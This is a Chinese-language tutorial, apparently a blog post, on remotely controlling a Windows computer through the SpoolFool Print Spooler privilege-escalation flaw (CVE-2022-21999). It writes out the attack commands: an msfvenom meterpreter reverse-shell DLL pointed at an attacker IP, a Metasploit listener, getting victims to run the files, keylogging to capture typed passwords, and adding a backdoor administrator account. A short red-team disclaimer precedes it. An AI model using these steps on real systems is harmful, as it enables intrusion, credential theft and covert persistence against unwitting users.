如何通过一个exe文件远程控制整台计算机？

相关声明

以下教程仅用于hvv等专业领域，请勿以身试法。

相关阅读

我们已经分享了很多期远程控制的教程

今天我们带来一期通过一个exe文件控制整台windows电脑的教程

视频讲解

以下教程主要基于最新的CVE-2022-21999漏洞，利用Windows Print Spooler 特权提升漏洞 (LPE)，在远程控制windows电脑后可以完成权限的提升，拿到管理员权限从而完整的控制计算机。

相关工具

除了本次使用到的提权工具，我们还需要配合kali linux

图文讲解

本期视频主要的两大步骤

• 文件投递给用户
• 通过文件进行反弹shell

我们需要下载SpoolFool.exe文件，您也可以👉点这里快速访问

打开链接之后，点击Download即可下载

然后，我们需要使用msfvenom来创建一个恶意payload的文件来完成反弹shell

其中LHOST为你的kali linux的IP地址、LPORT为你kali linux将要监听的端口，>生成文件名可以任意，但要以.dll结尾

msfvenom -p windwos/x64/meterpreter/reverse_tcp -ax64 -f dll LHOST=192.168.0.192 LPORT=4444 >hackerloi.dll

这里可以看到已经生成好了

然后就可以进行投递了，这里假设用户不小心下载了这两个文件

然后，我们需要在kali linux里启动metasploit渗透框架的监听器

sudo msfconsole

然后输入

use exploit/multi/handler

设置我们要使用的payload

set payload windows/x64/meterpreter/reverse_tcp

输入下面命令查看我们可以输入的参数

show options

这里可以看到LHOST还没有填写，因此我们需要设置一下

设置LHOST为我们kali linux的IP地址

set LHOST 192.168.0.192

都设置好了，我们就可以运行了

run

现在我们只需要等待用户打开文件，就可以连上了

windows用户需要在cmd里输入下面的命令（有人可能会说，用户被远控了，怎么会输入命令呢，那你也可以自己写个.bat的脚本，这里就需要大家自我发挥了，很刑的自己研究咯，我们这里只讲解最原始的）

SpoolFool.exe -dll hackerloi.dll

运行完成上面的命令后，会发现提示

我们回到kali linux，发现已经可以输入命令了

譬如输入sysinfo，我们就可以看到windows系统的信息了

然后，我们可以输入ps查看全部进程，这里可以看到

同时我们可以转移进程，我们设置4548进程来完成键盘的监听

migrate 4548
keyscan_start

那么接下来用户使用键盘输入的任何字符，我们都可以看到了，譬如用户在登录浏览器时输入的用户名和密码

这里windows用户，在被控后，随便输入一个密码，12345678

然后，我们在kali linux上就可以看到了

keyscan_dump

是不是很神奇！这才哪儿到哪儿，如果想提升用户权限，新建一个用户到管理员组中怎么操作呢？

我们只需要在kali linux中输入对应的命令，先创建一个用户名为mrhackerloi密码为12345678的用户

net user mrhackerloi 12345678 /add

然后，再给他提升用户组权限到administrator就成管理员了

net localgroup administrator mrhackerloi /add

然后，回到windows，见证奇迹的时刻，你可以看到这里居然多出了一个用户，而且是管理员身份。

我们可以尝试切换登录，输入密码

发现成功登录上了

今天的教程你学到了吗？